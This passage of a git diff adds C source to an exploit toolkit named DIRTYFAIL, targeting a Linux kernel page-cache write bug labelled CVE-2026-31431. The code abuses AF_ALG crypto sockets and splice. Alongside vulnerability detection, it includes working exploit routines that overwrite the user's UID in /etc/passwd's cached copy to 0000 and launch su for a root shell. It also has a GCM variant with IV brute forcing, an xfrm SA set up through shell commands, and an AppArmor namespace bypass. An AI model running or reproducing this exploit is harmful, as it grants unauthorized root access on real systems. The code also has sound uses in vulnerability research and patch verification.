β€” but "success" here + * just means "the syscalls completed". Whether the write actually + * landed must be confirmed by the caller via a read-back. + * ---------------------------------------------------------------- */ +bool cf_4byte_write(const char *target_path, + off_t target_off, + const unsigned char four_bytes[4]) +{ + int target_fd = open_and_cache(target_path); + if (target_fd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + return false; + } + + int op = af_alg_setup_socket(); + if (op < 0) { + log_bad("AF_ALG setup: %s", strerror(errno)); + close(target_fd); + return false; + } + + if (!af_alg_send_aad(op, four_bytes)) { + log_bad("sendmsg AAD: %s", strerror(errno)); + close(op); close(target_fd); + return false; + } + + int pipefd[2]; + if (pipe(pipefd) < 0) { + log_bad("pipe: %s", strerror(errno)); + close(op); close(target_fd); + return false; + } + + /* file -> pipe: 32 bytes from offset target_off (CRYPTLEN+TAGLEN). */ + off_t off = target_off; + ssize_t n1 = splice(target_fd, &off, pipefd[1], NULL, SPLICE_LEN, 0); + if (n1 != SPLICE_LEN) { + log_bad("splice file->pipe: got %zd want %d (%s)", + n1, SPLICE_LEN, strerror(errno)); + close(pipefd[0]); close(pipefd[1]); close(op); close(target_fd); + return false; + } + + /* pipe -> op socket: kernel now has page-cache pages in dst SGL. */ + ssize_t n2 = splice(pipefd[0], NULL, op, NULL, SPLICE_LEN, 0); + close(pipefd[0]); close(pipefd[1]); + if (n2 != SPLICE_LEN) { + log_bad("splice pipe->op: got %zd want %d (%s)", + n2, SPLICE_LEN, strerror(errno)); + close(op); close(target_fd); + return false; + } + + /* Drive the AEAD. recv will fail with EBADMSG (auth check fails on + * our zero key + zero ciphertext); the scratch write has already + * happened by then. */ + unsigned char drain[256]; + ssize_t r = recv(op, drain, sizeof(drain), 0); + int saved = errno; + (void)r; + close(op); + close(target_fd); + errno = (saved == EBADMSG || saved == EINVAL || r >= 0) ? 0 : saved; + return errno == 0; +} + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t copyfail_detect(void) +{ + log_step("Copy Fail (CVE-2026-31431) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x (affected lines: 6.12, 6.17, 6.18)", km, kn); + + /* Probe AF_ALG availability and instantiation of authencesn. */ + int probe = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (probe < 0) { + log_ok("AF_ALG socket family unavailable (%s) β€” NOT vulnerable", + strerror(errno)); + return DF_PRECOND_FAIL; + } + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1); + if (bind(probe, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + log_ok("authencesn template not loadable (%s) β€” NOT vulnerable", + strerror(errno)); + close(probe); + return DF_PRECOND_FAIL; + } + close(probe); + log_ok("AF_ALG + %s loadable", ALG_NAME); + + /* Sentinel file probe. */ + char tmpl[] = "/tmp/copyfail-sentinel.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { + log_bad("mkstemp: %s", strerror(errno)); + return DF_TEST_ERROR; + } + unsigned char sentinel[PAGE]; + for (size_t i = 0; i < PAGE; i += 32) + memcpy(sentinel + i, "COPYFAIL-SENTINEL-UNCORRUPTED!!\n", 32); + if (write(sfd, sentinel, PAGE) != PAGE) { + log_bad("sentinel write: %s", strerror(errno)); + close(sfd); unlink(tmpl); + return DF_TEST_ERROR; + } + close(sfd); + + log_step("triggering primitive against %s with marker '%s'", + tmpl, MARKER_STR); + if (!cf_4byte_write(tmpl, 0, (const unsigned char *)MARKER_STR)) { + unlink(tmpl); + return DF_TEST_ERROR; + } + + /* Re-read the sentinel via a fresh fd (page cache, not disk). */ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[PAGE]; + ssize_t got = read(rfd, after, PAGE); + close(rfd); + unlink(tmpl); + if (got != PAGE) return DF_TEST_ERROR; + + /* Look for the marker. We expect it to land somewhere inside the + * 32-byte spliced region (offsets 0..31). */ + unsigned char *hit = memmem(after, 32, MARKER_STR, 4); + bool orig_has_marker = memmem(sentinel, 32, MARKER_STR, 4) != NULL; + if (hit && !orig_has_marker) { + size_t off = hit - after; + log_warn("VULNERABLE β€” marker '%s' landed at sentinel offset %zu", + MARKER_STR, off); + log_warn("apply the upstream fix (commit a664bf3d or distro backport)"); + log_warn("interim mitigation: blacklist the algif_aead module"); + return DF_VULNERABLE; + } + + /* Sometimes the layout puts the scratch write outside the first + * 32 bytes; check the whole page for ANY divergence. */ + size_t diff_count = 0, first_diff = (size_t)-1; + for (size_t i = 0; i < PAGE; i++) { + if (after[i] != sentinel[i]) { + if (first_diff == (size_t)-1) first_diff = i; + diff_count++; + } + } + if (diff_count > 0) { + log_warn("page cache MODIFIED (%zu bytes changed, first at offset %zu)", + diff_count, first_diff); + log_warn("the marker layout differs but the underlying bug class " + "still allowed a page-cache page into the AEAD dst SGL"); + return DF_VULNERABLE; + } + + log_ok("page cache intact β€” NOT vulnerable on this kernel"); + return DF_OK; +} + +/* ---------------------------------------------------------------- * + * Exploit + * ---------------------------------------------------------------- */ + +df_result_t copyfail_exploit(bool do_shell) +{ + log_step("Copy Fail (CVE-2026-31431) β€” exploit"); + + /* Resolve the calling user. We deliberately do not exploit as + * root or for arbitrary users β€” only the user who ran us. */ + uid_t uid = getuid(); + if (uid == 0) { + log_warn("already root β€” nothing to escalate"); + return DF_OK; + } + struct passwd *pw = getpwuid(uid); + if (!pw) { + log_bad("getpwuid(%u): %s", uid, strerror(errno)); + return DF_TEST_ERROR; + } + const char *user = pw->pw_name; + log_step("target user: %s (uid %u)", user, uid); + + off_t uid_off = 0; + size_t uid_len = 0; + char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("could not find %s in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd: UID field at offset %lld = '%s' (%zu chars)", + (long long)uid_off, uid_str, uid_len); + + if (uid_len != 4) { + log_bad("this technique needs a 4-digit UID; got '%s' (%zu chars)", + uid_str, uid_len); + log_hint("either pick a different user with a 4-digit UID, or use " + "the multi-shot variant (not implemented in DIRTYFAIL)."); + return DF_TEST_ERROR; + } + + log_warn("about to flip /etc/passwd page cache: '%s' -> '0000'", uid_str); + log_warn("on-disk file is unchanged. cleanup options:"); + log_warn(" 1) DIRTYFAIL --cleanup (POSIX_FADV_DONTNEED + drop_caches)"); + log_warn(" 2) echo 3 > /proc/sys/vm/drop_caches (from root)"); + log_warn(" 3) reboot"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + return DF_OK; + } + if (!ssh_lockout_check(user)) { + log_bad("SSH-lockout confirmation declined β€” aborting"); + return DF_OK; + } + + log_step("issuing 4-byte page-cache write..."); + if (!cf_4byte_write("/etc/passwd", uid_off, + (const unsigned char *)"0000")) { + log_bad("primitive failed"); + return DF_EXPLOIT_FAIL; + } + + /* Verify via a fresh read against the page cache. */ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, "0000", 4) != 0) { + log_bad("write did not land β€” page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0", user); + + /* Sanity check via libc β€” getpwnam() walks NSS, which on most + * systems hits files first, so this should agree with our patch. */ + struct passwd *p = getpwnam(user); + if (p) log_step("getpwnam('%s').pw_uid = %u", user, p->pw_uid); + + if (!do_shell) { + if (dirtyfail_no_revert) { + log_warn("--no-revert: leaving page cache poisoned (run " + "`dirtyfail --cleanup` or reboot to revert)"); + return DF_EXPLOIT_OK; + } + log_hint("--no-shell selected; reverting page cache"); + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' β€” enter your own password to drop into a root shell", + user); + log_hint("after exit, run DIRTYFAIL --cleanup or reboot"); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp su: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} diff --git a/modules/copy_fail_family/copyfail.h b/modules/copy_fail_family/copyfail.h new file mode 100644 index 0000000..90a012a --- /dev/null +++ b/modules/copy_fail_family/copyfail.h @@ -0,0 +1,33 @@ +/* + * DIRTYFAIL β€” copyfail.h + * + * Public surface for the Copy Fail (CVE-2026-31431) module. + */ + +#ifndef DIRTYFAIL_COPYFAIL_H +#define DIRTYFAIL_COPYFAIL_H + +#include "common.h" + +/* Run all preflight checks and the sentinel-file primitive probe. + * Never modifies system files. */ +df_result_t copyfail_detect(void); + +/* Real PoC: flip the running user's 4-digit UID in /etc/passwd page + * cache to "0000" and (optionally) execve `su ` to drop a root + * shell. `do_shell` controls whether to invoke su; if false, the patch + * is reverted via POSIX_FADV_DONTNEED before returning so the system + * does not stay in a broken state. */ +df_result_t copyfail_exploit(bool do_shell); + +/* Low-level building block: write 4 bytes into the page cache of + * `target_path` at `target_off`. Caller must have read access to + * the file. Same primitive that copyfail_exploit uses internally; + * exposed for exploit_su.c to chain ~12 calls into a 48-byte + * shellcode plant against /usr/bin/su. Returns true if the AF_ALG + * sequence completed; caller MUST verify via re-read. */ +bool cf_4byte_write(const char *target_path, + off_t target_off, + const unsigned char four_bytes[4]); + +#endif diff --git a/modules/copy_fail_family/copyfail_gcm.c b/modules/copy_fail_family/copyfail_gcm.c new file mode 100644 index 0000000..22fcdc4 --- /dev/null +++ b/modules/copy_fail_family/copyfail_gcm.c @@ -0,0 +1,634 @@ +/* + * DIRTYFAIL β€” copyfail_gcm.c + * + * See copyfail_gcm.h for the design notes. This file implements: + * + * 1. AES-GCM keystream byte 0 computation via AF_ALG `gcm(aes)`. + * 2. IV brute force until keystream[0] equals the desired XOR mask. + * 3. SA installation via `ip xfrm state add ...` (system(3) β€” saves + * ~150 lines of netlink boilerplate vs. our authencesn path; the + * gcm primitive is the right place to take that dep, and every + * modern distro ships iproute2). + * 4. Splice trigger: ESP wire header (16B) + 1 target byte + 16-byte + * ICV pad. The kernel's in-place GCM decrypt XORs keystream[0] + * onto the spliced page-cache byte, which is what we control. + */ + +#include "copyfail_gcm.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include + +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, + size_t len, unsigned int flags); +#endif + +#ifndef UDP_ENCAP +#define UDP_ENCAP 100 +#endif +#ifndef UDP_ENCAP_ESPINUDP +#define UDP_ENCAP_ESPINUDP 2 +#endif + +#define ENCAP_PORT 4500 +#define ESP_SPI 0xCAFEBABE +#define IV_LEN 8 +#define ICV_LEN 16 +#define AES_KEY_LEN 16 +#define SALT_LEN 4 +#define KEY_TOTAL (AES_KEY_LEN + SALT_LEN) /* rfc4106 expects 20 */ + +/* Fixed AEAD key (16-byte AES key + 4-byte salt). Both are attacker- + * chosen β€” auth verification will fail at the end of decrypt anyway, + * the STORE has already happened by then. */ +__attribute__((unused)) +static const unsigned char AEAD_KEY[KEY_TOTAL] = { + 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, + 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, + 0x10, 0x11, 0x12, 0x13, +}; + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t copyfail_gcm_detect(void) +{ + log_step("Copy Fail GCM variant β€” detection"); + + int km, kn; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + /* Probe AF_ALG availability of rfc4106(gcm(aes)). */ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) { + log_ok("AF_ALG unavailable β€” GCM variant unreachable"); + return DF_PRECOND_FAIL; + } + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, "rfc4106(gcm(aes))", sizeof(sa.salg_name) - 1); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + log_ok("rfc4106(gcm(aes)) not loadable β€” GCM variant unreachable"); + close(s); + return DF_PRECOND_FAIL; + } + close(s); + log_ok("AF_ALG + rfc4106(gcm(aes)) loadable"); + + bool userns = unprivileged_userns_allowed(); + log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); + + if (!userns) { + log_warn("preconditions partial β€” userns blocked. Try with --aa-bypass."); + return DF_PRECOND_FAIL; + } + + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” unprivileged userns lacks caps; xfrm SA install " + "via `ip xfrm` requires CAP_NET_ADMIN that the AA policy denies."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing rfc4106(gcm) trigger against /tmp sentinel"); + df_result_t pr = copyfail_gcm_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE β€” GCM-variant of xfrm-ESP page-cache write reachable"); + log_warn("apply mainline patch f4c50a4034e6 or distro backport"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* ---------------------------------------------------------------- * + * AES-GCM keystream byte 0 β€” computed via AF_ALG `ecb(aes)` instead + * of `aead gcm(aes)`. + * + * BACKGROUND + * ---------- + * Originally we used AF_ALG `aead` `gcm(aes)`: bind, set key + tag size, + * sendmsg with assoclen=0 + 1-byte zero plaintext, read back 17 bytes + * of (ciphertext || tag). The first byte of the output IS the keystream + * byte we want (since pt=0 means ct = ks XOR 0 = ks). + * + * That worked in unit tests on some kernels but on Ubuntu 24.04 / 6.8 + * the read() blocks indefinitely β€” the 1-byte AEAD plaintext doesn't + * produce output until additional data is sent or the socket is shut + * down. Tracking down the exact "what does this kernel want" was a rat + * hole. + * + * Instead, we compute keystream byte 0 directly. Per NIST SP 800-38D, + * GCM with a 12-byte nonce derives the initial counter as + * J0 = nonce || 0x00000001 + * and the counter for the first plaintext block is J0 + 1 = + * nonce || 0x00000002 + * The keystream block is E_K(that counter), so: + * keystream[0] = AES-128-ECB(K, nonce || 0x00000002)[0] + * + * AF_ALG `ecb(aes)` is bulletproof β€” single-block in, single-block out, + * no MSG_MORE / shutdown semantics to get wrong. ~6 Β΅s per call on a + * 4-core VM, vs ~50 Β΅s for the AEAD path that didn't actually work. + * + * (cf2's copyfail2.c uses OpenSSL EVP_aes_128_gcm to do the same + * computation indirectly. We avoid the libssl dependency by going + * through AF_ALG ECB directly.) + * ---------------------------------------------------------------- */ + +#ifdef __linux__ + +static int gcm_open(void) +{ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) return -1; + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "skcipher", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, "ecb(aes)", sizeof(sa.salg_name) - 1); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(s); return -1; + } + if (setsockopt(s, SOL_ALG, ALG_SET_KEY, + AEAD_KEY, AES_KEY_LEN) < 0) { /* AES-128 key */ + close(s); return -1; + } + return s; +} + +/* Compute byte 0 of the GCM keystream for the given 12-byte nonce by + * ECB-encrypting the counter block (nonce || 0x00000002). */ +static bool gcm_keystream_byte0(int ecb_s, const uint8_t nonce[12], + uint8_t *out_byte) +{ + int op = accept(ecb_s, NULL, NULL); + if (op < 0) return false; + + /* Counter block: J0 + 1 = nonce(12) || 0x00000002. The +1 is + * because GCM reserves J0 itself for the auth-tag XOR, so the + * first plaintext block uses J0+1. */ + uint8_t block[16]; + memcpy(block, nonce, 12); + block[12] = 0; block[13] = 0; block[14] = 0; block[15] = 2; + + char cbuf[CMSG_SPACE(sizeof(unsigned int))] = {0}; + unsigned int op_enc = ALG_OP_ENCRYPT; + + struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) }; + struct cmsghdr *c = CMSG_FIRSTHDR(&msg); + c->cmsg_level = SOL_ALG; + c->cmsg_type = ALG_SET_OP; + c->cmsg_len = CMSG_LEN(sizeof(unsigned int)); + memcpy(CMSG_DATA(c), &op_enc, sizeof(op_enc)); + + struct iovec iov = { .iov_base = block, .iov_len = 16 }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + + if (sendmsg(op, &msg, 0) != 16) { close(op); return false; } + + uint8_t out[16]; + ssize_t n = read(op, out, 16); + close(op); + if (n != 16) return false; + *out_byte = out[0]; + return true; +} + +/* Brute force IV until keystream byte equals want_ks. Returns iters + * tried; writes the winning 8-byte IV into iv_out. */ +static int64_t gcm_brute_iv(uint8_t want_ks, uint8_t iv_out[IV_LEN]) +{ + int s = gcm_open(); + if (s < 0) { + log_bad("gcm_open: %s", strerror(errno)); + return -1; + } + uint8_t nonce[12]; + memcpy(nonce, AEAD_KEY + AES_KEY_LEN, SALT_LEN); /* salt prefix */ + + for (uint64_t v = 1; v < (1ULL << 32); v++) { + memcpy(nonce + SALT_LEN, &v, IV_LEN); /* low 8 bytes */ + uint8_t ks; + if (!gcm_keystream_byte0(s, nonce, &ks)) { + close(s); + return -1; + } + if (ks == want_ks) { + memcpy(iv_out, &v, IV_LEN); + close(s); + return (int64_t)v; + } + if ((v & 0xFFF) == 0 && v > 16384) { + /* progress hint after 16k attempts (very unlucky case). */ + log_hint("gcm IV brute: %llu trials so far...", + (unsigned long long)v); + } + } + close(s); + return -1; +} + +/* ---------------------------------------------------------------- * + * SA install via `ip xfrm state add ...` + * ---------------------------------------------------------------- */ + +static bool ip_run(const char *fmt, ...) +{ + char cmd[2048]; + va_list ap; + va_start(ap, fmt); + vsnprintf(cmd, sizeof(cmd), fmt, ap); + va_end(ap); + int rc = system(cmd); + return rc == 0; +} + +static bool gcm_install_sa(const uint8_t iv[IV_LEN]) +{ + char keyhex[KEY_TOTAL * 2 + 3]; + char *p = keyhex; + p += sprintf(p, "0x"); + for (int i = 0; i < KEY_TOTAL; i++) + p += sprintf(p, "%02x", AEAD_KEY[i]); + + /* `ip xfrm state add` registers a transport-mode ESP SA over + * loopback with rfc4106(gcm(aes)) AEAD. Encap is ESPINUDP/4500 + * matching what we'll send via splice. */ + (void)iv; /* IV travels in the wire packet, not the SA. */ + return ip_run( + "ip link set lo up >/dev/null 2>&1 ; " + "ip xfrm state flush >/dev/null 2>&1 ; " + "ip xfrm state add src 127.0.0.1 dst 127.0.0.1 proto esp " + "spi 0x%08x encap espinudp %d %d 0.0.0.0 " + "aead 'rfc4106(gcm(aes))' %s 128 replay-window 32 >/dev/null 2>&1", + ESP_SPI, ENCAP_PORT, ENCAP_PORT, keyhex); +} + +/* ---------------------------------------------------------------- * + * Splice trigger + * ---------------------------------------------------------------- */ + +static bool gcm_trigger(const char *target_path, off_t target_off, + const uint8_t iv[IV_LEN]) +{ + int rs = socket(AF_INET, SOCK_DGRAM, 0); + if (rs < 0) return false; + int encap = UDP_ENCAP_ESPINUDP; + setsockopt(rs, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)); + struct sockaddr_in la = { + .sin_family = AF_INET, + .sin_port = htons(ENCAP_PORT), + .sin_addr.s_addr = htonl(INADDR_LOOPBACK), + }; + int reuse = 1; + setsockopt(rs, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); + if (bind(rs, (struct sockaddr *)&la, sizeof(la)) < 0) { + close(rs); return false; + } + + /* Build attacker page in /tmp: ESP header(16) + ICV pad at offset + * 4096. We splice these from a real file so the kernel sees them + * as page-cache pages on the splice path. */ + char atkpath[64]; + snprintf(atkpath, sizeof(atkpath), "/tmp/dirtyfail-gcm.%d", (int)getpid()); + unlink(atkpath); + int afd = open(atkpath, O_RDWR | O_CREAT | O_EXCL, 0600); + if (afd < 0) { close(rs); return false; } + + unsigned char esp_hdr[16]; + *(uint32_t *)(esp_hdr + 0) = htonl(ESP_SPI); + *(uint32_t *)(esp_hdr + 4) = htonl(1); /* SeqNum */ + memcpy(esp_hdr + 8, iv, IV_LEN); + if (pwrite(afd, esp_hdr, 16, 0) != 16) goto fail; + + unsigned char icv[ICV_LEN] = {0}; + if (pwrite(afd, icv, ICV_LEN, 4096) != ICV_LEN) goto fail; + fsync(afd); +#ifdef POSIX_FADV_DONTNEED + posix_fadvise(afd, 0, 0, POSIX_FADV_DONTNEED); +#endif + + int afd2 = open(atkpath, O_RDONLY); + if (afd2 < 0) goto fail; + unlink(atkpath); + + int tfd = open(target_path, O_RDONLY); + if (tfd < 0) { close(afd2); goto fail; } + + int p[2]; + if (pipe(p) < 0) { close(afd2); close(tfd); goto fail; } + fcntl(p[0], F_SETPIPE_SZ, 1 << 20); + fcntl(p[1], F_SETPIPE_SZ, 1 << 20); + + /* esp_hdr (16) || target_byte (1) || icv_pad (16) β€” 33 bytes total. */ + loff_t off; + off = 0; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail; + off = target_off; if (splice(tfd, &off, p[1], NULL, 1, SPLICE_F_MOVE) != 1) goto trig_fail; + off = 4096; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail; + + int ss = socket(AF_INET, SOCK_DGRAM, 0); + if (ss < 0) goto trig_fail; + if (connect(ss, (struct sockaddr *)&la, sizeof(la)) < 0) { close(ss); goto trig_fail; } + ssize_t sent = splice(p[0], NULL, ss, NULL, 16 + 1 + 16, SPLICE_F_MOVE); + (void)sent; + close(ss); + close(p[0]); close(p[1]); + + /* Wait for esp_input to finish the in-place STORE before we + * tear down sockets. 150ms matches V4bel's reference; 50ms was + * working on x86 lab kernels but tight on ARM64 / loaded VMs. */ + usleep(150 * 1000); + unsigned char drain[256]; + (void)recv(rs, drain, sizeof(drain), MSG_DONTWAIT); + + close(afd2); close(tfd); close(afd); close(rs); + return true; + +trig_fail: + close(p[0]); close(p[1]); close(afd2); close(tfd); +fail: + close(afd); close(rs); + unlink(atkpath); + return false; +} + +/* ---------------------------------------------------------------- * + * Public 1-byte primitive + * ---------------------------------------------------------------- */ + +bool cfg_1byte_write(const char *target_path, + off_t target_off, unsigned char want_byte) +{ + /* Read current byte. */ + int tfd = open(target_path, O_RDONLY); + if (tfd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + return false; + } + unsigned char cur = 0; + if (pread(tfd, &cur, 1, target_off) != 1) { + log_bad("pread current: %s", strerror(errno)); + close(tfd); return false; + } + close(tfd); + + if (cur == want_byte) { + return true; /* already what we want */ + } + + uint8_t want_ks = cur ^ want_byte; + + log_step("cfg_1byte_write off=%lld 0x%02x -> 0x%02x (need_ks=0x%02x)", + (long long)target_off, cur, want_byte, want_ks); + + /* Brute force IV via AF_ALG. */ + uint8_t iv[IV_LEN]; + int64_t iters = gcm_brute_iv(want_ks, iv); + if (iters < 0) { + log_bad("gcm IV brute force failed (want_ks=0x%02x)", want_ks); + return false; + } + log_step(" IV found in %lld iters", (long long)iters); + + /* Install SA. */ + if (!gcm_install_sa(iv)) { + log_bad("ip xfrm state add failed"); + return false; + } + log_step(" SA installed"); + + /* Trigger. */ + if (!gcm_trigger(target_path, target_off, iv)) { + log_bad("gcm trigger failed"); + return false; + } + log_step(" trigger fired"); + + /* Verify. */ + int v = open(target_path, O_RDONLY); + if (v < 0) return false; + unsigned char post = 0; + if (pread(v, &post, 1, target_off) != 1) { close(v); return false; } + close(v); + if (post != want_byte) { + log_bad("byte at off=%lld is 0x%02x, wanted 0x%02x", + (long long)target_off, post, want_byte); + return false; + } + return true; +} + +#else /* !__linux__ */ +bool cfg_1byte_write(const char *p, off_t o, unsigned char b) +{ (void)p; (void)o; (void)b; return false; } +#endif + +/* ---------------------------------------------------------------- * + * Top-level exploit (UID flip end-to-end) + * ---------------------------------------------------------------- */ + +/* INNER (bypass userns): cfg_1byte_write Γ— 4 to flip UID digits to '0'. */ +df_result_t copyfail_gcm_exploit_inner(void) +{ +#ifdef __linux__ + const char *user = getenv("DIRTYFAIL_TARGET_USER"); + if (!user || !*user) { + log_bad("inner: DIRTYFAIL_TARGET_USER not set"); + return DF_TEST_ERROR; + } + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("inner: find_passwd_uid_field('%s') failed", user); + return DF_TEST_ERROR; + } + if (uid_len != 4) { + log_bad("inner: UID '%s' not 4 chars", uid_str); + return DF_TEST_ERROR; + } + for (size_t i = 0; i < 4; i++) { + if (uid_str[i] == '0') continue; + log_step("inner: flip /etc/passwd[%lld] '%c' -> '0'", + (long long)(uid_off + i), uid_str[i]); + if (!cfg_1byte_write("/etc/passwd", uid_off + i, '0')) { + log_bad("inner: byte flip failed at offset %lld", + (long long)(uid_off + i)); + return DF_EXPLOIT_FAIL; + } + } + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +/* OUTER (init ns): prompts β†’ fork bypass child β†’ wait β†’ verify β†’ su. */ +df_result_t copyfail_gcm_exploit(bool do_shell) +{ + log_step("Copy Fail GCM variant β€” exploit"); + + uid_t target_uid = getuid(); + if (target_uid == 0) { + log_warn("already root in init namespace"); + return DF_OK; + } + + struct passwd *pw = getpwuid(target_uid); + if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } + const char *user = pw->pw_name; + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("user %s not found in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd UID for %s: '%s' at offset %lld", + user, uid_str, (long long)uid_off); + if (uid_len != 4) { + log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len); + return DF_TEST_ERROR; + } + + log_warn("about to flip /etc/passwd UID via rfc4106(gcm(aes)) byte-flips"); + log_warn("(four 1-byte writes β€” one per UID digit not already '0')"); + if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; } + if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; } + + setenv("DIRTYFAIL_INNER_MODE", "gcm", 1); + setenv("DIRTYFAIL_TARGET_USER", user, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init ns */ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) return DF_EXPLOIT_FAIL; + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, "0000", 4) != 0) { + log_bad("verify: page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0 (via GCM path)", user); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' in init ns β€” enter your password for REAL root", user); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” `--scan --active`. + * + * Install GCM SA with an arbitrary IV and fire ONE trigger against a + * /tmp sentinel. We skip the IV brute force: keystream XOR ciphertext + * is unpredictable but ANY byte change at sentinel[0] proves the + * kernel ran the in-place STORE. + * ---------------------------------------------------------------- */ + +df_result_t copyfail_gcm_active_probe_inner(void) +{ +#ifdef __linux__ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("gcm-probe: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + + /* Arbitrary fixed 8-byte wire IV (rfc4106 wraps it with the 4-byte + * SA salt to form the 12-byte GCM nonce). Keystream is deterministic + * given this IV + key, but we don't need to predict it for the + * probe β€” any byte change in sentinel[0] proves the STORE happened. */ + static const uint8_t probe_iv[IV_LEN] = { + 0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x02, 0x03, 0x04 + }; + + if (!gcm_install_sa(probe_iv)) { + log_bad("gcm-probe: ip xfrm state add failed"); + return DF_TEST_ERROR; + } + if (!gcm_trigger(sentinel, 0, probe_iv)) { + log_bad("gcm-probe: trigger failed"); + return DF_TEST_ERROR; + } + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +df_result_t copyfail_gcm_active_probe(void) +{ + char tmpl[] = "/tmp/dirtyfail-gcm-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("gcm-probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { 